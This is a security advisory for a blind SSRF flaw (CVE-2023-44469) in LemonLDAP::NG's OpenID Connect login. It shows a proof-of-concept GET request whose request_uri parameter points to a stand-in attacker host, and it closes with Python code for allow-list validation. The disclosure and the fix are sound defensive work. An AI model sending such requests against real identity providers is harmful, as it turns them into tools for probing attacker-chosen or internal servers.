[Security:low][CVE-2023-44469] SSRF vulnerability in OIDC SSO
Affected version
Version: lemonldap-ng 2.16.2-1
Platform: Apache
Summary
The vulnerability is very similar to the one found in other OIDC implementations. The SSRF occurs when the request_uri parameter in the authorization URL is changed to an attacker-chosen value.
Here is a blogpost describing similar issues in other implementations: https://security.lauritz-holtmann.de/post/sso-security-ssrf/
Details
Here is the GET request in detail:
GET /oauth2/authorize?client_id=<redacted>&nonce=<redacted>&redirect_uri=<redacted>&response_type=code&scope=openid%20profile%20email&state=<redacted>&request_uri=https://attacker_url.com/requesturi.jwt HTTP/1.1
Host: auth.sso.domain.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.int.govcert.etat.lu/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Authorization: Negotiate <some base64 redacted>
Cookie: lemonldappdata=<redacted>
A request containing the parameter request_uri set to an arbitrary URL value (https://attacker_url.com/requesturi.jwt) was sent to the OpenID Authorization Server. As a consequence, the OpenID Provider interacts with the remote attacker server listening on the specified URL, demonstrating that it is vulnerable to blind SSRF.
Possible fixes
For security reasons the URI value of the request_uri parameter should be carefully validated server-side; otherwise an attacker could make the OpenID Provider interact with an arbitrary server under their control and then potentially exploit SSRF vulnerabilities. It is advisable to define a strict whitelist of allowed URI values (pre-registered during the OpenID client registration process) for the request_uri parameter.
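The whitelist check described above, written as an added illustration rather than code from LemonLDAP::NG (which is Perl; Python is used here for readability). The client registrations, the `fetch` callback and the function names are assumptions; the rejection error code `invalid_request_uri` is the one OIDC Core defines for this case.

```python
"""Allow-list validation of the OIDC request_uri parameter (added example)."""
from urllib.parse import urlsplit

# Constructed client registrations: each client pre-registers the exact
# request_uri values it may use (the "request_uris" registration metadata).
CLIENTS = {
    "client-a": {"request_uris": ["https://rp.example.org/ro/login.jwt"]},
    "client-b": {"request_uris": []},   # this client never uses request_uri
}

def request_uri_allowed(client_id, request_uri):
    """True only if request_uri is exactly one of the client's pre-registered
    values and uses https. No normalisation and no prefix matching: either
    would let an attacker-controlled host slip past the check."""
    client = CLIENTS.get(client_id)
    if client is None or not isinstance(request_uri, str):
        return False
    parts = urlsplit(request_uri)
    if parts.scheme != "https" or not parts.netloc:
        return False
    return request_uri in client["request_uris"]

def resolve_request_object(client_id, params, fetch):
    """Authorization-endpoint helper. `fetch(url)` is the HTTP client,
    injected so the example runs offline. The vulnerable pattern is to call
    fetch() on whatever request_uri the caller supplied; here the outbound
    request is only made after the allow-list check has passed."""
    request_uri = params.get("request_uri")
    if request_uri is None:
        return None                      # no request object to fetch
    if not request_uri_allowed(client_id, request_uri):
        raise ValueError("invalid_request_uri")   # OIDC Core error code
    return fetch(request_uri)

if __name__ == "__main__":
    contacted = []
    def fake_fetch(url):             # stands in for the provider's HTTP client
        contacted.append(url)
        return "jwt-body"
    try:
        resolve_request_object("client-a",
            {"request_uri": "https://attacker_url.com/requesturi.jwt"}, fake_fetch)
    except ValueError as err:
        print("rejected:", err)
    print(contacted)                 # [] : the attacker host was never contacted
```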